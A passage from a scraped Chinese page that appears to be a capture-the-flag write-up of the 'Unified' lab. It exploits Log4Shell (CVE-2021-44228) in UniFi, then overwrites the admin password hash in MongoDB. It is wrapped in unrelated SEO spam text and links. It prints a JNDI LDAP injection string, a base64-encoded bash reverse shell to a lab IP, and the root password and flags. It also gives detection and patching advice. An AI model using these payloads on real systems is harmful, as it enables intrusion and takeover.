当前位置: 首页 > news >正文

dw网页制作多少钱网站建设优化公司排名

dw网页制作多少钱,网站建设优化公司排名,网站搜索引擎优化报告,给个网址兄弟前言 各位师傅大家好#xff0c;我是qmx_07#xff0c;今天给大家讲解Unified靶机 渗透过程 信息搜集 服务器开放了SSH服务#xff0c;HTTP服务 访问网站 验证log4j2漏洞 8443端口#xff1a;UniFi 网络 #xff0c;访问查询 是否有Nday漏洞利用 可以观察到UniFi的版…前言 各位师傅大家好我是qmx_07今天给大家讲解Unified靶机 渗透过程 信息搜集 服务器开放了SSH服务HTTP服务 访问网站 验证log4j2漏洞 8443端口UniFi 网络 访问查询 是否有Nday漏洞利用 可以观察到UniFi的版本号:6.4.54 通过搜索引擎查询该服务拥有CVE-2021-44228 漏洞 使用tcpdump工具 监听网卡流量 通过修改remember字段 ${jndi:ldap://10.10.16.2/otomcat}可以看到UniFi服务器 对 本地服务器 发起了请求确认存在log4j2漏洞 利用log4j2漏洞反弹会话 工具准备 准备工具 1.openjdk-11-jdk sudo apt-get install openjdk-11-jdk -y 2.Maven sudo apt-get install maven -y 3.编译maven git clone https://github.com/veracode-research/rogue-jndi cd rogue-jndi mvn package rogue-jndi开启本机ldap服务允许接收其他服务器数据可执行代码 生成反弹命令 进行base64加解密 echo bash -c bash -i /dev/tcp/10.10.16.2/4444 01 | base64使用命令 java -jar target/RogueJndi-1.1.jar --command bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuMi80NDQ0IDAJjEK}|{base64,-d}|{bash,-i} --hostname 10.10.16.2这段代码的意思是 使用之前制作的base64 反弹代码进行base64解密bash加载目标是10.10.16.2同时要监听端口会话等待反弹 ${jndi:ldap://10.10.16.2:1389/otomcat}通过remember字段 构造命令反弹会话 script /dev/null -c bash监听端口稳固会话 通过修改mongoDb数据库 管理员密码进入网站后台 查询unifi 中间件的数据库一般默认是mongdb数据库mongdb默认数据库为ace 数据库端口开放在 27117 mongo --port 27117 ace 指定端口号连接mongo数据库 db.admin.find().forEach(printjson);通过这个命令可以枚举用户信息并且以json格式打印 通过hashid工具 分析哈希值使用的加密方式 通过mkpasswd 设置哈希编码构造新密码 db.admin.update({_id: ObjectId(61ce278f46e0fb0012d47ee4)},{$set:{x_shadow:$6$0dOBQ6ZeDhxJi9Df$HEFkxcqfmWhHbyt0h4WAAzRNqg9n.19ryJfXy.ZcRkcAWKvjy9IQ42OAjRRafoEXTf5ZqzVByYnIuk9U/a8Py1}});查找administrator管理员账户id修改密码 为之前生成的哈希密码更新成功 成功进入后台 通过后台提供的ssh获取flag 账号:root密码:NotACrackablePassword4U2022 登录用户 用户flag:6ced1a6a89e666c0620cdb10262ba127 root flag:e50bc93c75b634e4b272d2f771c33681 知识点讲解 受影响版本 Apache Log4j 2.x 2.14.1 受影响的应用组件: Apache Solr Apache Flink Apache Druid srping-boot-strater-log4j2 log4j2漏洞原理 log4j2 框架下的 lookup服务提供了 {}字段解析功能传进去 的 值会 被 直接解析JNDI服务会请求 远程服务 来 连接 本地对象这时候 只用在{}里面调用JNDI服务即可 反弹shell 到指定服务器 流量特征 数据包里面有{jndi: ldap}字段 修复: 1.禁止 用户 请求 参数 出现 攻击关键字 ​2.禁止 lookup 下载远程文件 3.禁止 log4j2 应用 连接外网 答案 1.服务器开放的前四个端口是什么? 22,6789,8080,8443 2.8443端口运行服务的标题是什么? UniFi Network 3.中间件版本是多少? 6.4.54 4.此CVE编号是多少? CVE-2021-44228 5.JNDI注入使用什么协议 ldap 6.用什么工具来监测网卡验证是否存在漏洞? TcpDump 7.需要拦截哪个流量端口 389 8.Mongod服务运行在哪个端口? 27117 9.UniFi 在Mongod数据库的默认库是什么? ace 10.在Mongod数据库中使用什么命令来枚举用户信息 db.admin.find() 11.在Mongod数据库中使用什么明来来更新数据? db.admin.update() 12.root用户的密码是什么 NotACrackablePassword4U2022 13.用户flag是什么? 6ced1a6a89e666c0620cdb10262ba127 14.root flag是什么? e50bc93c75b634e4b272d2f771c33681 总结 我们介绍了log4j2 漏洞 原理、流量特征、修复意见、利用过程 和 Mongod数据库 更换 管理员密码 登录后台使用hashid 分析哈希值、mkpasswd 来生成密码
http://www.dnsts.com.cn/news/191924.html

相关文章:

  • 打开建设银行网站怎么建手机网站平台
  • 网站上如何设置行间距网站信息抽查评估 短信
  • html网站头部如何制作外贸模板网站
  • 局域网站建设教程wordpress和帝国
  • 深圳龙华建网站大学网站建设与功能开发
  • 石家庄网站建设方案推广盘锦网站建设报价
  • wordpress 作者 评论网站安全优化
  • 网站域名是什么东西泉州网站建设 首选猴子网络
  • 商城网站建设流程图网站开发的进度表
  • 制作网站首页邢台做网站找谁
  • 如何建设学校网站做ppt哪些网站的图片质量高
  • 微信红包网站制作开发定制电商平台
  • 广州市越秀区建设和水务局网站阳江招聘网最新招聘信息网兼职
  • 常州做网站优化长沙医院网站建设
  • 模板建站是什么昆明网站制作策划
  • 别墅外观设计网站推荐电商模板网站
  • 搜索网站 模板基础微网站开发代理商
  • 连云港网站建设 连云港网站制作做社情网站犯法怎么办
  • 西昌网站开发公司深圳网站建设制作报价
  • 福永外贸网站建设创办公司需要多少资金
  • 什么网站可以做设计一站式进货平台网站建设
  • 辽宁智能网站建设推荐WordPress到底好不好用
  • 哪个网站建设商招代理海外社交网络推广
  • 吉林网站建设公司洛可可设计公司主页
  • 网站icon图标怎么设置网站注册后能不能注销
  • 网站建设购买模板网页设计素材为什么拖不进ps
  • 百度网站优点网站开发公司怎么查询
  • 网站建设流程讯息旅游网站建设与规划论文
  • 湖州哪里做网站h5 网站开发流程图
  • 加强网站队伍建设中国优秀网页设计